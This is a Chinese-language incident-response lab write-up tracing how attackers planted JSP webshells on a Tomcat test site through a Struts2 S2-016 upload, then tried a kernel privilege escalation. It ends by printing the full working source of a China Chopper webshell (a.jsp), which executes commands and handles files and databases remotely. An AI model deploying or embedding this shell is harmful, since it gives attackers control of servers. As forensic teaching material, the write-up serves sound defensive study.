web入侵实战分析-常见web攻击类应急处置实验1

场景说明：

某天运维人员发现在/opt/tomcat8/webapps/test/目录下，多出了一个index_bak.jsp这个文件，

并告诉你如下信息

操作系统：ubuntu-16.04业务：测试站点中间件：tomcat开放端口：22，8080，8009tomcat目录：/opt/tomcat8/站点根目录：/opt/tomcat8/webapps

排查过程

1.确认文件被创建的时间

找到网站根目录下的index_bak.jps文件， 查看index_bak.jps的时间点

查看文件内容，可以看到有密码，还有一些数据库操作模块的导入，其中的        REQUEST_CHARSET     和PAGE_CHARSET应该是为了躲避防火墙入侵检测用的，这是一个木马

2.web扫描确认

1.我们把tomcat的源码目录打包为归档文件，然后使用杀毒工具来检测

使用ssh的sftp来拷贝下来，使用d盾来查杀，在这里我们扫到了两个后门，我们再看一下a.jsp这个后门的创建时间

发现a.jsp也是一个典型的木马

来看一下a.jsp的创建时间

我们得到了两个文件的创建时间

a.jsp：2018-10-20 17:14:00
index_bak.jsp：2018-10-22 16:57:13

我们来访问以下a.jsp这个网站文件，看看是可以访问，是否有权限访问,是报错，那么我们使用中国蚁剑来连接试试

我们使用菜刀吧，使用蚁剑不行，不支持.jsp格式的木马

使用菜刀成功连接

访问另一个木马文件，我们访问之后输入的密码，就是备份文件中的密码

得到了以下界面，说明大马被正常执行了

3.web日志分析

日志目录是/opt/tomcat8/logs/

使用vscode打开文件夹，然后查找文本

发现192.168.199.205在2018-10-20-17:14:06首次访问a.jsp登录服务器

同样，我们再搜索index_bak.jsp，发现172.20.10.13在2018-10-22-16:57:55首次访问了

对于a.jsp172.20.10.13和192.168.199.105都访问过a.jsp，然后index_bak.jsp只有172.20.10.13访问过，得到攻击者的ip地址如下

192.168.199.105
172.20.10.13

排查在访问a.jsp之上的，攻击者ip地址访问网站的记录，找到可疑的路径，带有攻击参数的路径

1.结合a.jsp的创建时间为2018-10-20-17-14-00来搜索日志，发现有一条路径是和a.jsp时间吻合的

这条记录是可疑的

2./test/fileupload/doUpload.action继续查看其他可疑日志，发现尝试了使用登录接口，但在页面中测试，接口无法上传文件，所以排除

3./manager/html曾多次访问tomcat管理界面，manager是tomcat的管理目录，多次访问都是401，所以没有通过口令进入到管理页面

通过排查，我们发现网站使用的status框架，使用工具检测是否存在status漏洞

我们可以看后缀是否存在后缀为.action来判断是否是status2框架的网站

然后通过工具检测结果发现存在很多漏洞

我们使用命令执行看看

到此我们基本可以确实攻击者使用了s2-016漏洞进行攻击，然后通过文件上传来上传文件a.jsp连接菜刀了，由于web日志中没有记录POST请求的数据，我们就不知道攻击者执行了哪些命令，做了什么事情了

4.系统排查

排查系统是否有异常

我们在struts中测试whoami会显示dbapp用户，所以可能是通过dbapp用户来提权的，我们先从dbapp家目录开始排查

在它的家目录中，发现了两个可以的文件，a*和a.c*比较可疑

查看时间

我们得知了

2018-10-22-16:48:39上传了a
2018-10-22-16:48:23上传了a.c

查看a.c的内容，发现是内核提权的脚本

到文件威胁平台中分析a发现为CVE-2017-16995可执行文件

黑客入侵过程

根据目前的信息，可以得到如下的结论
1.在2018-10-20 17:14:00利用s2-016，通过/test/showcase.action页面，上传了webshell，a.jsp，然后获得了tomcat的dbapp权限
2.2018-10-22-16:48:23在/home/dbapp/上传了a.c文件，经过编译，变成了a文件
3.2018-10-22-16:48:39在/home/dbapp/上传或者生成了a,并且尝试提权，但是提权失败了
4.2018-10-20-16:57:13通过a.jsp上传了大马index_bak.jsp攻击者的ip地址为：
192.168.199.105
172.20.10.13

a.jsp的内容

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="chopper";
String EC(String s,String c)throws Exception{return new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("X@Y");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("X@Y");out.print(sb.toString());
%>